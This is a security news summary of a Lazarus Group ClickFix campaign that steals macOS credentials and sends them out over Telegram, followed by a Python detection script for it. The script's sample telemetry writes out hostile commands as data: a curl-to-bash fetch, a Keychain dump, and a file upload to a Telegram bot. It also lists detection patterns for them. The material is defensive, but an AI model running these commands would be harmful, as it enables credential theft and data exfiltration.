Lazarus Group Launches 'Mach-O Man' macOS Malware Campaign Targeting Fintech and Crypto Businesses
Key Takeaways
- Lazarus Group is actively distributing a new macOS malware kit through fake meeting invitations sent via Telegram, targeting business leaders in fintech and crypto sectors
- The attack uses ClickFix social engineering techniques that prompt users to execute commands to 'fix' connection issues, bypassing traditional security controls
- Compromised macOS devices provide attackers with full access to credentials, browser sessions, and Keychain data—enabling account takeovers and infrastructure compromise
Summary
Security researchers have identified a new active campaign by the Lazarus Group that uses fake meeting invitations and social engineering to distribute a newly discovered macOS malware kit. The attack leverages ClickFix techniques, where victims are tricked into executing commands on their systems through fake collaboration platform interfaces mimicking Zoom, Microsoft Teams, or Google Meet. The campaign specifically targets fintech, cryptocurrency, and high-value environments where macOS is prevalent among developers, executives, and decision-makers.
Once executed, the malware collects sensitive credentials, browser sessions, and macOS Keychain data—providing attackers direct access to corporate systems, SaaS platforms, and financial assets. The stolen data is exfiltrated through Telegram, a legitimate service that helps attackers blend their activities into normal network traffic. The attack is particularly dangerous because it bypasses traditional endpoint detection and response (EDR) tools by relying on user execution of native macOS binaries rather than software vulnerabilities.
- The campaign is difficult to detect because it relies on social engineering and native macOS binaries, reducing visibility for traditional EDR tools
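The summary above points at three things a defender can actually look for on a Mac fleet: a user-typed shell command that pulls a remote "fix" script into an interpreter, a native command-line tool reading the Keychain from a script rather than from the UI, and Telegram traffic originating from a command-line tool instead of the Telegram desktop client. The following is an added example of that detection logic run over constructed endpoint telemetry; it is not code from the article or from the researchers it cites. The JSON-lines schema (`ts`, `proc`, `parent`, `cmdline`, `host`), the hostname `api.telegram.org` as the exfiltration endpoint, and the macOS `security` tool as the Keychain-reading native binary are all assumptions made here, not details the article states.

```python
"""Toy macOS detection rules for ClickFix-style credential theft with Telegram egress.

Added example, not code from the article. The telemetry schema, the
`api.telegram.org` endpoint and the `security` tool are assumptions.
"""
import json

TELEGRAM_DOMAIN = "telegram.org"           # assumed exfiltration domain
SHELLS = {"bash", "sh", "zsh"}
TERMINALS = {"Terminal", "iTerm2"}
# Native macOS verbs that read Keychain items (assumed; the article names no binary).
KEYCHAIN_READ_VERBS = ("dump-keychain", "find-generic-password", "find-internet-password")
# Telegram traffic from these tools, rather than the Telegram client, is anomalous.
CLI_NET_TOOLS = {"curl", "python3", "osascript", "nscurl"}

# Constructed sample telemetry, one JSON object per line. Hosts and token are placeholders.
SAMPLE_LOG = """\
{"ts": "2025-01-01T10:00:01Z", "proc": "bash", "parent": "Terminal", "cmdline": "bash -c 'curl -fsSL https://fix.example.invalid/repair | bash'", "host": "fix.example.invalid"}
{"ts": "2025-01-01T10:00:03Z", "proc": "security", "parent": "bash", "cmdline": "security dump-keychain login.keychain", "host": ""}
{"ts": "2025-01-01T10:00:05Z", "proc": "curl", "parent": "bash", "cmdline": "curl -F document=@/tmp/out.zip https://api.telegram.org/bot<TOKEN-PLACEHOLDER>/sendDocument", "host": "api.telegram.org"}
{"ts": "2025-01-01T10:05:00Z", "proc": "Telegram", "parent": "launchd", "cmdline": "/Applications/Telegram.app/Contents/MacOS/Telegram", "host": "api.telegram.org"}
{"ts": "2025-01-01T10:06:00Z", "proc": "bash", "parent": "Terminal", "cmdline": "bash -c 'brew update'", "host": ""}
"""


def parse_events(text: str) -> list:
    """Parse JSON-lines telemetry into a list of event dicts (blank lines skipped)."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def classify(ev: dict) -> list:
    """Return the names of every rule the event trips; an empty list means benign."""
    hits = []
    cmd = ev["cmdline"]

    # Rule 1 (ClickFix pattern): a shell launched from a terminal by the user that
    # fetches something remote and pipes it straight into another shell.
    if ev["proc"] in SHELLS and ev["parent"] in TERMINALS:
        fetches_remote = any(tool in cmd for tool in ("curl ", "wget "))
        piped_to_shell = any(f"| {shell}" in cmd for shell in SHELLS)
        if fetches_remote and piped_to_shell:
            hits.append("clickfix_remote_script_to_shell")

    # Rule 2 (credential theft via native binary): the Keychain read by `security`
    # when its parent is a script/shell rather than an interactive GUI session.
    if ev["proc"] == "security" and ev["parent"] in SHELLS \
            and any(verb in cmd for verb in KEYCHAIN_READ_VERBS):
        hits.append("keychain_read_from_shell")

    # Rule 3 (exfiltration blending into legitimate traffic): Telegram egress from
    # a command-line tool. The Telegram client itself talking to Telegram is normal.
    if ev["host"].endswith(TELEGRAM_DOMAIN) and ev["proc"] in CLI_NET_TOOLS:
        hits.append("telegram_egress_from_cli_tool")

    return hits


def scan(text: str) -> list:
    """Run every rule over the telemetry and return (timestamp, rule) pairs."""
    return [(ev["ts"], rule) for ev in parse_events(text) for rule in classify(ev)]


if __name__ == "__main__":
    for ts, rule in scan(SAMPLE_LOG):
        print(ts, rule)
```

The useful property is that each rule keys on the process lineage, not on a file hash: the Telegram client reaching `api.telegram.org` and a developer running `brew update` from Terminal both pass, while the same domain reached from `curl`, or a `curl | bash` typed into Terminal, is flagged. That is the kind of behavioural signal that survives the campaign's reliance on signed native binaries.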